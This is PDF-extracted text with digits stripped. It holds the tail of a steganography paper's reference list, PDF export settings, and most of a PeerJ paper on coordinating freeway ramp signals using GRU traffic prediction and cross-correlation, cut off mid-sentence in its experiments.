ah. . classification of steganalysis techniques: a study. mathematical and software engineering ( ): – . pak c, kim j, an k, kim c, kim k, pak c. . a novel color image lsb steganography using improved d chaotic map. multimedia tools and applications ( – ): – doi . /s - - - . provos n, honeyman p. . detecting steganographic content on the internet. ann arbor: center for information technology integration, – . riaz m, ahmed j, shah ra, hussain a. . novel secure pseudorandom number generator based on duffing map. wireless personal communications ( ): – doi . /s - - - . satish k, jayakar t, tobin c, madhavi k, murali k. . chaos based spread spectrum image steganography. ieee transactions on consumer electronics ( ): – doi . /tce. . . shenker sj. . scaling behavior in a map of a circle onto itself: empirical results. physica d: nonlinear phenomena ( – ): – doi . / - ( ) - . stanev s, szczypiorski k. . steganography training: a case study from university of shumen in bulgaria. international journal of electronics and telecommunications ( ): – doi . /eletel- - . van dooren r. . on the transition from regular to chaotic behaviour in the duffing oscillator. journal of sound and vibration ( ): – doi . /s - x( ) - . walker j. . ent: a pseudorandom number sequence test program. available at http://www. fourmilab.ch/random/. wang z, bovik ac, sheikh hr, simoncelli ep. . image quality assessment: from error visibility to structural similarity. ieee transactions on image processing ( ): – doi . /tip. . . westfeld a, pfitzmann a. . attacks on steganographic systems. in: international workshop on information hiding. – . wu p, chang x, yang y, li x. . basn—learning steganography with a binary attention mechanism. future internet ( ): doi . /fi . yadav p, dutta m. . -level security based spread spectrum image steganography with enhanced peak signal to noise ratio. in: fourth international conference on image information processing (iciip). piscataway: ieee, – . zhelezov s. . modified algorithm for steganalysis. mathematical and software engineering ( ): – . kordov and zhelezov ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /tce. . http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /eletel- - http://dx.doi.org/ . /s - x( ) - http://www.fourmilab.ch/random/ http://www.fourmilab.ch/random/ http://dx.doi.org/ . /tip. . http://dx.doi.org/ . /fi http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ steganography in color images with random order of pixel selection and encrypted text message embedding introduction pseudo-random generator based on duffing map and circle map steganography in color images with random pixel selection experimental setup steganographic analysis computational and complexity analysis conclusions references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs /cht /dan /deu /esp /fra /ita /jpn /kor /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor /ptb /suo /sve /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice coordinated ramp signal optimization framework based on time series flux-correlation analysis coordinated ramp signal optimization framework based on time series flux-correlation analysis zhi liu, wendi shu, guojiang shen and xiangjie kong college of computer science and technology, zhejiang university of technology, hangzhou, zhejiang, china abstract urban expressways provide an effective solution to traffic congestion, and ramp signal optimization can ensure the efficiency of expressway traffic. the existing methods are mainly based on the static spatial distance between mainline and ramp to achieve multi-ramp coordinated signal optimization, which lacks the consideration of the dynamic traffic flow and lead to the long time-lag, thus affecting the efficiency. this article develops a coordinated ramp signal optimization framework based on mainline traffic states. the main contribution was traffic flow-series flux-correlation analysis based on cross-correlation, and development of a novel multifactorial matric that combines flow-correlation to assign the excess demand for mainline traffic. besides, we used the gru neural network for traffic flow prediction to ensure real-time optimization. to obtain a more accurate correlation between ramps and congested sections, we used gray correlation analysis to determine the percentage of each factor. we used the simulation of urban mobility simulation platform to evaluate the performance of the proposed method under different traffic demand conditions, and the experimental results show that the proposed method can reduce the density of mainline bottlenecks and improve the efficiency of mainline traffic. subjects algorithms and analysis of algorithms, artificial intelligence, data mining and machine learning, mobile and ubiquitous computing keywords ramp signal optimization, correlation analysis, gru neural network introduction traffic congestion on urban roads is an important issue that needs to be addressed in smart cities’ development. furthermore, in addition to road congestion in the city center, urban expressways, as the hub connecting work areas and living areas, have a high load concentration during commuting, causing extensive congestion and spread quickly. the most direct and convenient way to address high traffic congestion is ramp signal duration adjustment (papageorgiou & kotsialos, ). while the expressway suffers heavy congestion during the morning and evening rush hours, the adjacent ramps are under tremendous traffic pressure. the local ramp signal optimization only considers the traffic status of one section of the ramp convergence area of the central expressway, which may aggravate the overall traffic congestion and may reduce the effective utilization of upstream-downstream traffic facilities (zhang & wang, ). when there are multiple how to cite this article liu z, shu w, shen g, kong x. . coordinated ramp signal optimization framework based on time series flux-correlation analysis. peerj comput. sci. :e doi . /peerj-cs. submitted november accepted february published march corresponding author xiangjie kong, xjkong@ieee.org academic editor zhiwei gao additional information and declarations can be found on page doi . /peerj-cs. copyright liu et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:xjkong@�ieee.�org https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ bottlenecks on the mainline or the limited capacity on the ramp, coordinated ramp signal optimization that aims at stabilizing the smooth flow on the mainline and prevent queue spillback on multiple ramps may be more effective than local optimization. in recent years, as the sensor is all over a wider range, and the accuracy is improved, real-time monitoring of urban traffic is achievable—the analysis of big data and the processing of data-driven methods to optimize the traffic signal become novel solutions (feng et al., ). existing methods use only local information, such as spatial distance, od information (chen et al., b). they determine the traffic flow priority without consideration of the similarity of traffic patterns between the congested section and the on-ramp. traffic flow is time-varying, and similar traffic flow patterns imply that the on-ramp has higher importance for congestion at that moment, and the lack of this consideration leads to a decrease in control efficiency. besides, the traditional approach lacks consideration of traffic flow evolution trends and future traffic patterns, which can lead to a long time-lag. in this article, we propose a coordinated ramp signal optimization framework based on time series flux-correlation analysis. initially, we collected the historical traffic data of the road from the pems database. then, we used neural networks to make online predictions about traffic flow every h and measured the predicted flow-series correlation between the congested section and ramps. furthermore, based on the gray correlation analysis, we compared the similarity of the three traffic factors’ curves, including the correlations, spatial distance and traffic volume, with the curves of speed and obtain the corresponding contribution weights of each attribute. finally, we used a heuristic strategy to optimize multiple-ramps signals with competing priorities coordinately. we compared the performance of the proposed method and the traditional method under different traffic demands. our contributions are summarized as follows: � traffic flow prediction. the traffic data of the congested road and ramps are predicted by gru neural network in the time dimension to obtain the traffic flow at the future time to ensure real-time and prospective optimization. � flux-correlation measurement. the correlation of the traffic flow-series between the congested section and the upstream ramps is obtained by the cross-correlation method. � novel metrics for flow priority. together with distance and predicted on-ramp flow, the correlations establish the weight matrix, allocating the excess traffic demand. � heuristic ramp signal optimization. the bottleneck algorithm is used to implement our signal optimization framework based on the weight matrix. the remainder of the article organized as follows: “literature review” describes the traffic flow prediction method and the time-series correlation measurement; “framework design” demonstrates how the coordinated ramp signal optimization framework developed; “experiment” evaluates the performance of the method based on the simulation of urban mobility (sumo) simulation platform and “results” summarizes the full text. liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ literature review traffic flow prediction using large-scale historical traffic data for traffic flow prediction and solving traffic management, guidance and route planning problems have become a hot research topic today (uras et al., ). in essence, traffic flow forecasting is the extraction of experience and knowledge from relevant historical data to estimate the future state. previous studies can usually be divided into parametric and nonparametric methods (zhang et al., ). parametric methods provide simple estimates of future traffic conditions with low computational complexity. however, they are only applicable to specific traffic data conditions because changes in external conditions and the randomness and nonlinearity of traffic flow can impact prediction accuracy (kong et al., , ). time series analysis models use curve fitting and parameter estimation to predict future traffic flow information. the most typical method is the autoregressive integrated moving average (arima). the arima model adds an integral link to the autoregressive and sliding average models to eliminate short-term fluctuations in the time series. many variants have been derived based on arima, such as sarima (williams & hoel, ), which adds a periodic term to this base. this method is suitable for smoother traffic flows and is not sufficient for predicting complex traffic conditions. nonparametric models have unique advantages. however, these traditional machine learning methods require labeling data in model training. furthermore, these methods capture traffic flow characteristics using artificial features, making it difficult to achieve desirable prediction results. kumar, parida & katiyar ( ) used traffic volume, speed, density and time as input variables and used the artificial neural network for short time traffic flow prediction. many deep learning models have been proposed to solve the traffic flow prediction problem with the more expansive urban road sensing device arrangement and improved recognition accuracy. stacked autoencoder (sae) (lv et al., ) uses a hierarchical greedy algorithm to obtain spatio-temporal traffic flow characteristics. recurrent neural networks have been widely used for short-time traffic flow prediction because of their ability to process arbitrary length inputs using memory units. lstm and gru (cho et al., ) derived from rnn have shown better prediction performance. zheng et al. ( ) proposed a convolutional lstm neural network based on attention mechanism to extract the spatio-temporal features of traffic flow. they also use bi-lstm module to extract the daily and weekly long-term features of traffic flow. liu, wang & zhu ( ) used a gated cnn instead of lstm to extract the temporal features of traffic flow and combined with cnn’s spatial features to predict the traffic flow. besides, traffic flow prediction with graph convolutional neural networks is becoming a trend (shen, zhao & kong, ). han proposed dirgraph convolutional neural network to tackle the congestion recognition problem through a new graph feature extraction method (han et al., ). in this article, we use the gru neural network for traffic flow prediction. firstly, we mainly forecast the downstream section’s traffic volume, so the traffic sequence’s temporal liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ characteristic should be mainly concerned. secondly, the traffic flow of the freeway is relatively stable. the variation of traffic flow in each section of the freeway mainly depends on the traffic flow entering and leaving the ramp, so we do not consider the traffic flow’s spatial characteristics. finally, compared with other neural network methods, the design of gru is more straightforward and meets our requirements for operability. time-series correlation the correlation measurement between the vectors generally achieves through the distance matrix, including euclidean distance (berkhin, ) and manhattan distance (bakar et al., ). conventional methods are generally used for two time-series data of the same length and different time lags. however, since there is necessarily a time lag between the traffic flow time series, there is no point-to-point correspondence between the two on the time axis. researchers have come up with several ways to overcomes this shortcoming, such as dynamic time warping (berndt & clifford, ) and cross-correlation (liao, ). in this article, cross-correlation is selected for correlation measurement. it has been applied to anomaly detection of key performance indicators (li et al., ) and the classification of traffic smart card data (he, agard & trépanier, ). meanwhile, it is also widely used in the field of time series clustering (paparrizos & gravano, ). su et al. ( ) first proposes the concept of flux-correlation. this research proposed an unsupervised method to determine the correlation of server kpi fluctuations as well as the direction of fluctuations. if the fluctuations of one series are correlated with the fluctuations of another series over a period of time, then define two series are flux-correlated. we compare the flux-correlation between ramps and bottleneck sections in this article to explore the correlation between flow fluctuations. multi-ramp coordination signal optimization in addition to ramp signal optimization, other methods include the mainline variable speed limit. however, because there are few mainline variable speed limit applications, the actual deployment is difficult and the safety risks are high. therefore, mpc control strategy is mostly used at present, which is a typical nonlinear optimal control method that can predict the control effect to achieve control optimality, most commonly by combining the mainline variable speed limit method and the ramp control method to achieve synergistic control of both (hegyi, de schutter & hellendoorn, ; van de weg et al., ). multi-ramp coordination signal optimization methods can be mainly divided into model-based and model-free methods (papageorgiou & kotsialos, ). the optimal coordination method is realized based on the traffic flow model. according to the real-time traffic flow information, the control rate is solved by taking the shortest travel time and waiting time as the control objectives and the mainline capacity and ramp queue length as the constraints. traffic flow models such as the payne model (chang & li, ), the cell transmission model (chen, lin & jiang, ; meng & khoo, ; schmitt, ramesh & lygeros, ) and metanet (dabiri & kulcsar, ; frejo & camacho, ; kontorinaki, karafyllis & papageorgiou, ) are widely used. meshkat applied a quantitative hierarchical model to ramp coordination signal optimization for the first liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ time (meshkat et al., ). chen added real-time od information based on meshkat to determine the priority of on-ramp flow through the total vehicle travel distance (chen et al., b). in the field of the model-free method, most researches focus on various heuristic algorithms, such as helper (lipp, corcoran & hickman, ), swarm (paesani et al., ) and hero (papamichail et al., b). in meanwhile, many researchers adopt a data-driven approach to optimize ramp signals. chen uses large-scale traffic data and integrates external weather factors to analyze and model the evolution pattern of traffic congestion. the signal duration adjusts dynamically through dynamic congestion threshold classification and congestion mode clustering. for the first time, the analysis of big traffic data was applied to ramp signal optimization, with more careful considerations and more consistent with the actual situation (chen et al., a). zhang uses large-scale vehicle trajectory data to extract the vehicle on-ramp behavior pattern, trace the source of congestion formation, and optimize the signal duration of multiple ramps (zhang et al., ). we combine the dynamic traffic flow correlation based on the traditional heuristic method. the excess traffic demand is assigned by tracing the distribution weights of the congestion sources. framework design in this article, the coordinated signal optimization framework is divided into three parts: data pre-processing, traffic flow analysis and signal optimization scheme generation. the coordinated signal optimization framework aims to combine dynamic traffic flow information to optimize real-time signals dynamically. initially, the framework first restores and organizes the raw traffic data through the data pre-processing module. furthermore, the smoothed historical traffic flow data is trained to obtain the offline model. secondly, we predict the real-time traffic flow data by the traffic flow analysis module and perform correlation analysis on the predicted traffic data. the weight matrix is obtained by combining distance, ramp flow and traffic correlation. finally, we develop a coordinated signal optimization scheme for signal timing of multiple ramps. the structure of framework is shown in fig. . data pre-processing time series data is a set of observations, and time series are generally discrete collections of discrete points that contain temporal relationships in contrast to other vectors. a set of traffic flow time series data is continuous observed values collected by a loop detector according to equally spaced time stamps. a set of time series can be represented as q¼ q ; q ; …; qi; …; qn½ �, where qi is the observed traffic flow value based on the time index value. but the raw data is not organized and needs to be filtered, repaired and smoothed. after data cleaning, it will become serial data. the raw traffic data is the traffic information of each highway’s detection point at a certain moment. we choose roads with complete data. make sure that there is the least liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ amount of missing data in two consecutive month time periods. the final data for the experiment is obtained and some examples are shown in table below. although the quality of the data obtained through screening is high, noise and missing data inevitably occur, which can negatively affect traffic flow prediction results. many situations can cause missing and abnormal traffic data, such as data anomalies caused by sensor failures and missing data during data transmission. noise points are irregularly distributed in the data set, and the judgment of noise points is mainly based on the distribution of data before and after the noise points. if a point is significantly higher or lower than the data before and after, or the value is higher than the normal situation, we judge it as a noise point and remove it. after processing the noise points, it will produce discontinuity of time series, i.e. missing data. in addition, the data itself may miss some points of data because of equipment failure and other reasons, so it is significant for data repairing. the processing methods for missing data are divided into short-time missing and long-time missing. short-time missing refers to missing data around min. figure multi-ramp coordinate signal optimization framework. full-size doi: . /peerj-cs. /fig- table an example of the processed data. timestamp station direction … total flow (vel) avg occupancy (%) avg speed (km/h) / / : : n … . . / / : : n … . . / / : : n … . . / / : : n … . . / / : : n … . . / / : : n … . . / / : : n … . . / / : : n … . . / / : : n … . . / / : : n … . . liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we directly use the last time point instead. long-time missing refers to the absence of multiple consecutive time points, and we take the average value of the historical data for the same period as a substitute. finally, the data are smoothed based on the use of the locally estimated scatterplot smoothing method. the processed data is smoother and more continuous than the raw data, which is consistent with the real situation and helps the neural network’s training, and improves the neural network’s prediction performance. this article uses neural network and time series methods to analyze dynamic traffic flows. in order to ensure real-time optimization, we first make a short-term prediction of the traffic flow, because accurate traffic flow forecasting is a key part of the overall framework. this article uses gru neural network for online traffic flow prediction. the neural network can better describe the randomness and nonlinearity of traffic flow (fu, zhang & li, ) and get more accurate prediction results compared to linear models such as arima. gru was proposed by cho et al. ( ) and is very similar to lstm, but is simpler to compute compared to lstm. figure shows the structure of gru neural network. the input and output structure of gru is similar to a typical recurrent neural network. the hidden state of memory cells is computed in the following formulas: zt ¼ sðwz � ½ht� ; xt�Þ ( ) rt ¼ sðwr � ½ht� ; xt�Þ ( ) ~ht ¼ tanhðw � ½rt � ht� ; xt�Þ ( ) ht ¼ ð � ztÞ � ht� þ zt � ~ht ( ) for the current node, the input values are the current input xt and the hidden state ht− containing the information of the previous node, and the output values are the output yt figure the structure of gru networks. full-size doi: . /peerj-cs. /fig- liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ of the current node and the hidden state ht containing the information of this node. gru first obtains the gating states z and r by two input values, where z is the gate that controls the update and r is the gate that controls the reset. then it calculates the candidate hidden layer ht, which represents the new information at the current moment, and controls the retention of the previous memory with r. finally, both forgetting and remembering steps are performed simultaneously, using the update gate z to control the amount of information that needs to be forgotten from the previous moment’s hidden layer ht− , and the amount of memory for the currently hidden layer information ht. traffic flow analysis once the predicted values of the mainline and ramp flow are obtained, we measure the flux-correlation between flow-series, to find the relationship between mainline and ramps. in this article, we choose the cross-correlation algorithm (paparrizos & gravano, ) to measure the correlation, which is a similarity measure for time-lagged time series of traffic flow. the value of cross-correlation ranges between [− , ], while closing to , indicating a strong correlation and a strong negative correlation close to − . for the time series x = (x , x , …, xn) and y = (y , y , …, yn), the reciprocal method holds y stationary so that x slides along y. for each slide s of x, calculate their inner product as shown in the following equation. x ¼ ðx ; x ; …; xnÞ ( ) ys ¼ ð ; . . . ; zfflfflfflffl}|fflfflfflffl{jsj ; y ; y ; . . . ; yn�sÞ s � ðy �s; . . . ; yn� ; yn; ; . . . ; |fflfflfflffl{zfflfflfflffl} jsj Þ s , >>>< >>>: ( ) for all possible slides s, the inner product cc (x, y) is computed as the similarity between the two time series x and y. the equation is shown below. ccðx; yÞ ¼ pn�s i¼ xsþi � yi s � pnþs i¼ xi � yi�s s < >>< >>: ( ) the cross-correlation is the maximum value of the inner product, which represents the similarity between x and y under optimal phase sliding s conditions. because under optimal sliding conditions, pattern-similar x and y are exactly aligned, the internal product of both is maximal. therefore, the cross-correlation method overcomes the phase sliding problem and compares the shape similarity of two-time series. in practice, the normalized value of cross-correlation is usually used to limit the range to be within [− , ], where means strong correlation and − means that they are completely opposite. besides, a positive ncc means that two series are in the same direction, while a negative ncc means that when one series tends to increase, the other tends to decrease and vise versa. the eq. ( ) defines ncc. liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ nccðx; yÞ ¼ max s ð ccðx; yÞ xk k � yk k Þ ( ) generally, the distance between the bottleneck and ramp determines the weight matrix. in this article, we combine several factors to determine the weight matrix, including correlation, predicted ramp flow and distance. we measure the cross-correlation between the predicted flow-series of bottleneck and upstream ramps. if the value is greater than , it means that the ramps positively correlated with the bottleneck. the magnitude of the coefficient represents the degree of correlation. the value of correlation represents by ncc, together with the physical distance d(i, j) between the ramp and the bottleneck, and the predicted ramp traffic flow q(j) are taken as feature parameters of the weight matrix. if the number of correlations is less than , it means that the ramp flow is negatively correlated with the bottleneck flow, so the correlation has the opposite effect. therefore, we only consider the physical distance and the predicted ramp flow as the feature parameters of the weight matrix. as eq. ( ) shows, w(i, j) represents the weight of the j-th ramp for the i-th bottleneck. d(i, j) and q(j) are normalized parameters. l represents the correlation limitation, less than which means weak correlation between the time series, while a greater set shows strong correlation. this value is generally intermediate, in this equation is . . a, b represents the weight of the temporal correlation coefficient, in the weak correlation condition, correlation shows light impact, while the strong correlation condition has a greater impact. wði; jÞ ¼ a � dði; jÞþb � qðjÞ ncc ½� ; � a � nccði; jÞ þ b � dði; jÞþð � a � b Þ � qðjÞ ncc ð ; m� a � nccði; jÞ þ b � dði; jÞþð � a � b Þ � qðjÞ ncc ðm; � < : ( ) to explore the factors that are most relevant to the traffic states, (yu et al., ) used the gray correlation analysis to measure the similarity between the flow, occupancy, density curves, and the speed curves. grey correlation determines the degree of association between two factors based on how similar or dissimilar the trends are. it is often used to determine the relative strength of a project influenced by other factors. in this article, we compare the bottleneck speed curves with correlation value, the flow value of the on-ramps and the distance to optimize the parameters in eq. ( ). for attri;j ¼ ða ;j; a ;j; …; ak;jÞ; ai;j ncc; inflow; distancef g, we can obtain the degree of association grci;j ¼ ðgrc ;j; grc ;j; …; grck;jÞ; pk i¼ grci;j ¼ , and then the influence degree of ramp inflow and downstream speed. the influence degree shows how much influence will the factor affects downstream speed as eq. ( ), where the rs means road section number and k represents the factor number. influencedegreeinflow ¼ rs xk i¼ xrs j¼ grci;j ( ) equation ( ) calculates the final weight matrix. where m is the number of bottlenecks, this weighting matrix will be used in signal coordination optimization to liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ assign the excess traffic demand, in order to ensure the rationality of the traffic reduction at each ramp. wij ¼ wð ; Þ � � � wð ; mÞ .. . � � � .. . .. . wði; jÞ .. . .. . � � � .. . wðn; mÞ �������������� �������������� ( ) coordinated signal optimization the coordinated signal optimization method proposed in this article implements a dynamic weight matrix between the ramp and mainline. the application of this matrix in the bottleneck algorithm is mainly reflected in the calculation of the coordinated metering rate. the bottleneck algorithm first determines whether the road segment downstream of the ramp is a bottleneck based on the real-time occupancy or density of the road segment. when there are no bottlenecks in the multi-ramp area, the local metering rate is applied to each on-ramp. when a bottleneck generates in a road segment, the excess traffic demand for each bottleneck generated needs to be allocated to each ramp. the more restrictive value of the coordinated and local metering rates is taken, and the final ramp metering rate is obtained by considering the ramp queue length limitation. figure shows a segment of multi-ramp road section. initially, the local metering rate rl of each ramp at k time is calculated according to eq. ( ). the k represents metering parameter, and r̂ is the critical density of ramp downstream road section, rðk � Þ is average density of downstream road section at last time step. rlðj; k þ Þ ¼ rlðj; kÞ þ k � ½r̂ � rðkÞ� ( ) defining the difference between the entering flow (including the upstream inflow from the mainline and the flow entering the entrance ramp), and exiting flow (including the downstream outflow from the mainline and the flow exiting the exit ramp) as the excess demand for that segment, see eq. ( ). ddði; k þ Þ ¼ qinði; kÞ þ qonði; kÞ � qoutði; kÞ � qoffði; kÞ ( ) if the average density in a control cycle is higher than the threshold (eq. ( )); at the same time the excess demand is more than zero (eq. ( )), there is a risk of breakdown, defining such a segment as a bottleneck. r i; kð Þ . rthreshold ið Þ ( ) ddði; k þ Þ > ( ) it is necessary to calculate the coordinated metering rate to eliminate bottlenecks, and the coordinated metering rate is calculated as shown in the algorithm . liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ every bottleneck needs to reduce the excess demand ddði; k þ Þ, when ddði; k þ Þ < , the bottleneck is eliminating, qreductionði; k þ Þ ¼ . eq. ( ) shows the volume reduction of every ramp, wji is weight matrix. the max volume reduction is selected to calculate the coordinate metering rate in eq. ( ), based on metering rate r(j, k) last time step. qreductionði; k þ Þ ¼ ddði; k þ Þ ( ) qreductionði; j; k þ Þ ¼ qreductionði; k þ Þ � wji ( ) rcðj; k þ Þ ¼ rðj; kÞ � max i ½qreductionði; j; k þ Þ� ( ) the system metering rate adopts the more restrictive of coordinate metering rate and local metering rate as eq. ( ) shows. r ðj; k þ Þ ¼ min½rlðj; k þ Þ; rcðj; k þ Þ� ( ) if the ramp metering rate approaches zero, it will cause a ramp spillback, thus affect surface traffic. therefore, the metering rate needs to be constrained based on the queue length of the ramp. in eq. ( ), aðj; kÞ is the arrival rate of vehicles entering the entrance figure bottleneck section. full-size doi: . /peerj-cs. /fig- algorithm coordinate metering rate calculation. input: road section i; weight matrix wji output: coordinate metering rate rc for i in road section do if density > threshold and excess demand > then qreduction (i, k + ) = Δd (i, k + ); qreduction (i, j, k + ) = qreduction (i, k + ) ⋅wji; else i = i + rc (j, k + ) = r (j, k) − maxi [qreduction (i, j, k + )]; return rc liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ramp, v̂ðjÞ is the capacity of the j-th ramp, vðj; kÞ is the queue length of the j-th on-ramp at the previous time step, and t refers to a time step. the metering rate can be obtained by eq. ( ). rqueueðj; k þ Þ ¼ aðj; kÞ � t ½v̂ðjÞ � vðj; kÞ� ( ) rðj; k þ Þ ¼ max½r ðj; k þ Þ; rqueueðj; k þ Þ� ( ) the green duration is calculated based on the metering rate and sent to each signaler in eq. ( ). where c(j) indicates the signal cycle duration and rs(j) indicates the saturation flow rate. gðj; k þ Þ ¼ rðj; k þ Þ rsðjÞ � cðjÞ ( ) experiment traffic flow prediction the dataset used in this article is collected from the california pems platform, which provides -min intervals of freeway mainline loop detector data (both speed and flow) and on-ramp passing data. we select the flow data for the northbound upstream mainline and on-ramp of the i freeway from january to february , which has four on-ramps with a total length of approximately . km. the detector deployment locations show in fig. . combined with the local traffic flow characteristics, it can be found that the traffic flow is at its peak during : – : , which is suitable for applying ramp control. ramp control is not sufficient when the traffic flow is low, smooth traffic flow can be achieved using no control or simple demand capacity control (papageorgiou & kotsialos, ). we plotted the average traffic flow curve of the bottleneck road section over months in fig. . the red curve in the figure indicates the average traffic flow on the road section during the months. the blue part indicates the interval formed by the maximum and minimum traffic volumes. it can be seen from the graph that the traffic flow starts to increase at : and stays at a high level for a long time afterward. the interval we selected is the time segment with relatively high traffic volume, which helps verify the effectiveness of the signal optimization scheme. based on the above findings, flow data from : to : on february upstream of the mainline and the four ramps were selected as inputs, as shown in fig. . figure selected detectors and deployment locations. full-size doi: . /peerj-cs. /fig- liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in this article, the gru neural network is used for traffic flow prediction. the best lag time can minimize the prediction error of the model, and we use the maximum lag time of min. it is more reasonable to use historical values to predict the latter value, and fewer historical values lead to more deviations in the prediction results. more historical values lead to long computation time and are prone to overfitting. in addition to the lag time, we also need to choose the best parameters for the deep neural network model. we use a two-layer gru neural network with hidden cells in each layer, a batch size of , and a max epoch of . the training set uses forty-eight days of data ( . % of the total number of days), the test set uses the remaining nine days of data ( . %). we compare the gru neural network with two other methods, saes and lstms, respectively. we use the rooted mean squared error (rmse) and mean absolute percentage error (mape) as the metric to evaluate these methods. when the predicted value exactly figure traffic volume during months. (a) freeway mainline traffic volume during months. (b) freeway ramp traffic volume during months. full-size doi: . /peerj-cs. /fig- figure mainline and ramp flow demand. full-size doi: . /peerj-cs. /fig- liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ matches the true value, rmse is equal to , indicating a perfect model. rmse can be 